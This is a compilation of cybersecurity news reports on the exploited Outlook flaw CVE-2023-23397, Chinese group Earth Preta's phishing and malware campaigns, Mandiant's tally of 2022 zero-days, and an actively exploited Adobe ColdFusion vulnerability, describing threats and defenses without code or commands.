Microsoft on Friday shared guidance to help customers discover indicators of compromise (IoCs) associated with a recently patched Outlook vulnerability.
Tracked as CVE-2023-23397 (CVSS score: 9.8), the critical flaw relates to a case of privilege escalation that could be exploited to steal NT Lan Manager (NTLM) hashes and stage a relay attack without requiring any user interaction.
"External attackers could send specially crafted emails that will cause a connection from the victim to an untrusted location of attackers' control," the company noted in an advisory released this month.
"This will leak the Net-NTLMv2 hash of the victim to the untrusted network which an attacker can then relay to another service and authenticate as the victim.
The vulnerability was resolved by Microsoft as part of its Patch Tuesday updates for March 2023, but not before Russia-based threat actors weaponized the flaw in attacks targeting government, transportation, energy, and military sectors in Europe.
Microsoft's incident response team said it found evidence of potential exploitation of the shortcoming as early as April 2022.
In one attack chain described by the tech giant, a successful Net-NTLMv2 Relay attack enabled the threat actor to gain unauthorized access to an Exchange Server and modify mailbox folder permissions for persistent access.
The compromised email account was then used to extend the adversary's access within the compromised environment by sending additional malicious messages to target other members of the same organization.
"While leveraging NTLMv2 hashes to gain unauthorized access to resources is not a new technique, the exploitation of CVE-2023-23397 is novel and stealthy," Microsoft said.
"Organizations should review SMBClient event logging, Process Creation events, and other available network telemetry to identify potential exploitation via CVE-2023-23397."
The disclosure comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a new open source incident response tool that helps detect signs of malicious activity in Microsoft cloud environments.
Dubbed Untitled Goose Tool, the Python-based utility offers "novel authentication and data gathering methods" to analyze Microsoft Azure, Azure Active Directory, and Microsoft 365 environments, the agency said.
Earlier this year, Microsoft also urged customers to keep their on-premises Exchange servers updated as well as take steps to bolster their networks to mitigate potential threats.
Researchers Uncover Chinese Nation State Hackers' Deceptive Attack Strategies
24.3.23 BigBrothers The Hacker News
A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions.
The threat actor, active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich.
Attack chains mounted by the group commence with a spear-phishing email to deploy a wide range of tools for backdoor access, command-and-control (C2), and data exfiltration.
These messages come bearing with malicious lure archives distributed via Dropbox or Google Drive links that employ DLL side-loading, LNK shortcut files, and fake file extensions as arrival vectors to obtain a foothold and drop backdoors like TONEINS, TONESHELL, PUBLOAD, and MQsTTang (aka QMAGENT).
Similar infection chains utilizing Google Drive links have been observed delivering Cobalt Strike as early as April 2021.
"Earth Preta tends to hide malicious payloads in fake files, disguising them as legitimate ones — a technique that has been proven effective for avoiding detection," Trend Micro said in a new analysis published Thursday.
This entry point method, which was first spotted late last year, has since received a slight tweak wherein the download link to the archive is embedded within another decoy document and the file is password-protected in an attempt to sidestep email gateway solutions.
"The files can then be extracted inside via the password provided in the document," the researchers said. "By using this technique, the malicious actor behind the attack can successfully bypass scanning services."
Initial access to the victim's environment is followed by account discovery and privilege escalation phases, with Mustang Panda leveraging custom tools like ABPASS and CCPASS to circumvent User Account Control (UAC) in Windows 10.
Additionally, the threat actor has been observed deploying malware such as "USB Driver.exe" (HIUPAN or MISTCLOAK) and "rzlog4cpp.dll" (ACNSHELL or BLUEHAZE) to install themselves to removable disks and create a reverse shell with the goal of laterally moving across the network.
Other utilities deployed include CLEXEC, a backdoor capable of executing commands and clearing event logs; COOLCLIENT and TROCLIENT, implants that are designed to record keystrokes as well as read and delete files; and PlugX.
"Apart from well-known legitimate tools, the threat actors also crafted highly customized tools used for exfiltration," the researchers noted. This comprises NUPAKAGE and ZPAKAGE, both of which are equipped to collect Microsoft Office files.
The findings once again highlight the increased operational tempo of Chinese cyber espionage actors and their consistent investment in advancing their cyber weaponry to evade detection.
"Earth Preta is a capable and organized threat actor that is continuously honing its TTPs, strengthening its development capabilities, and building a versatile arsenal of tools and malware," the researchers concluded.
From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022
22.3.23 BigBrothers The Hacker News
As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.
While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.
The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types.
Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days.
Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year.
Much of the exploitation has focused on vulnerabilities in edge network devices such as firewalls for obtaining initial access. Various China-nexus clusters have also been spotted leveraging a flaw in Microsoft Diagnostics Tool (aka Follina) as part of disparate campaigns.
"Multiple separate campaigns may indicate that the zero-day was distributed to multiple suspected Chinese espionage clusters via a digital quartermaster," Mandiant said, adding it points to the "existence of a shared development and logistics infrastructure and possibly a centralized coordinating entity."
North Korean and Russian threat actors, on the other hand, have been linked to the exploitation of two zero-days each. This includes CVE-2022-0609, CVE-2022-41128, CVE-2022-30190, and CVE-2023-23397.
The disclosure comes as threat actors are also getting better at turning newly disclosed vulnerabilities into powerful exploits for breaching a wide range of targets across the world.
"While the discovery of zero-day vulnerabilities is a resource-intensive endeavor and successful exploitation is not guaranteed, the total number of vulnerabilities disclosed and exploited has continued to grow, the types of targeted software, including Internet of Things (IoT) devices and cloud solutions, continue to evolve, and the variety of actors exploiting them has expanded," Mandiant said.
The Mandiant report also follows a warning from Microsoft's Digital Threat Analysis Center about Russia's persistent kinetic and cyber targeting as the war in Ukraine continues into the second year.
The tech giant said since January 2023 it has observed "Russian cyber threat activity adjusting to boost destructive and intelligence gathering capacity on Ukraine and its partners' civilian and military assets."
It further warned of a possible "renewed destructive campaign" mounted by the nation-state group known as Sandworm (aka Iridium) on organizations located in Ukraine and elsewhere.
What's more, Kremlin-backed hackers have deployed at least two ransomware and nine wiper families against over 100 Ukrainian entities. No less than 17 European countries have been targeted in espionage campaigns between January and mid-February 2023, and 74 countries have been targeted since the start of the war.
Other key traits associated with Russian threat activity include the use of ransomware as weapons of cyber sabotage, gaining initial access through diverse methods, and leveraging real and pseudo hacktivist groups to expand the reach of Moscow's cyber presence.
CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild
16.3.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution.
"Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution," CISA said.
The vulnerability impacts ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, respectively, released on March 14, 2023.
It's worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have reached end-of-life (EoL).
While the exact details surrounding the nature of the attacks are unknown, Adobe said in an advisory that it's aware of the flaw being "exploited in the wild in very limited attacks."
Federal Civilian Executive Branch (FCEB) agencies are required to apply the updates by April 5, 2023, to safeguard their networks against potential threats.
Charlie Arehart, a security researcher credited with discovering and reporting the flaw alongside Pete Freitag, described it as a "grave" issue that could result in "arbitrary code execution" and "arbitrary file system read."